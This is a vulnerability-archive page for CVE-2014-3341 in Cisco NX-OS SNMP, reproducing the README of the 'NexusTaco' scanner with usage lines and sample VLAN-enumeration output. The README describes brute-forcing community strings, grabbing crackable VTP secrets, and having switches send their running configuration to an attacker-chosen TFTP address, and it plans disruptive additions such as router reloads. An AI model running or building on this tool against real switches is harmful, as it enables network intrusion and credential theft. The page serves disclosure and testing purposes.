Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2014-3341 PoC — Cisco NX-OS SNMP模块信息泄露漏洞

Source
Associated Vulnerability
Title:Cisco NX-OS SNMP模块信息泄露漏洞 (CVE-2014-3341)
Description:Cisco NX-OS on Nexus 5000和6000 devices是美国思科(Cisco)公司的一套运行于Nexus 5000和6000系列设备中的操作系统。 Nexus 5000和6000设备上的Cisco NX-OS 7.0(3)N1(1)及之前版本的SNMP模块中存在安全漏洞,该漏洞源于对于相同的VLAN ID,程序响应无效请求的方式不同。远程攻击者可通过发送一系列请求利用该漏洞枚举VLANs。
Description
CVE-2014-3341 exploit
Readme
snmpvlan
========
CVE ID: CVE-2014-3341.

Cisco Bug ID: CSCup85616.

NexusTaco is a snmp scanner that can be used both for internal testing and external testing to assess Cisco Nexus switches ( 5000 and 6000 family). 

There are many snmp scanners and brute forcers this was made for just completeness.It has the following features: 

*Finds Nexus switches specifically since they seem to reply to bogus community strings 

*Bruteforces Vlan ID’s which can be used for Vlan hopping / double tagging attacks without a community incase #3 doesn’t come through (useful for internal tests) 

*Bruteforces snmp community strings To find the following: **System uptime **Configured networks (leverage more ground) 

  **Files and folders 

  **VTP secret and password ( can be cracked since its md5 and might be the telnet login password if exists or used somewhere else) 

  **Once a write community string is found the running configuration file will be send to your set ip in argv[2]. You need to configure a tftp server like solar winds’s one or something. 

TODO: 

*Still looking up sneaky OID’s that can provide usernames that are configured locally on the switch 

*If found private snmp CS check if a AAA server is running (and get the shared secret wether radius or TACACS+) 

*Show logged in users 

*Disable snmp traps 

*Check for port security if configured incase you need to spoof your mac so you don’t loose your port(internal tests). 

*Use getopt ….. 

*Router reload over snmp just for evilness. 

*Anything else I forgot.

$ python NexusTaco.py python NexusTaco.py CIDR 

$ python NexusTaco.py x.x.x.x/32 127.0.0.1 100 

Thanks nmap for the ip list 

Finding vulnerable switches 

x.x.x.x:Is a nexus switch, Snmp open, Has Vlans configured

Finding VlanIDs on: x.x.x.x With incorrect community string

Host: x.x.x.x has VlanID 1 Configured 

Host: x.x.x.x has VlanID 2 Configured 

Host: x.x.x.x has VlanID 3 Configured 

Host: x.x.x.x has VlanID 4 Configured 

Host: x.x.x.x has VlanID 5 Configured 

Host: x.x.x.x has VlanID 6 Configured 

Host: x.x.x.x has VlanID 7 Configured 

Host: x.x.x.x has VlanID 8 Configured 

Host: x.x.x.x has VlanID 10 Configured 

Host: x.x.x.x has VlanID 31 Configured 

Host: x.x.x.x has VlanID 32 Configured 

Host: x.x.x.x has VlanID 33 Configured 

Host: x.x.x.x has VlanID 34 Configured 

Host: x.x.x.x has VlanID 35 Configured 

Host: x.x.x.x has VlanID 40 Configured 

Host: x.x.x.x has VlanID 64 Configured 

Host: x.x.x.x has VlanID 65 Configured 

Host: x.x.x.x has VlanID 97 Configured 

Host: x.x.x.x has VlanID 98 Configured 

Host: x.x.x.x has VlanID 99 Configured 

Host: x.x.x.x has VlanID 100 Configured

.....
File Snapshot

[4.0K] /data/pocs/86bfac93e443ab28bd15c74faae67322b0a2978b ├── [1.1K] License ├── [5.2K] NexusTaco.py ├── [2.6K] README.md └── [ 844] strings.txt 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.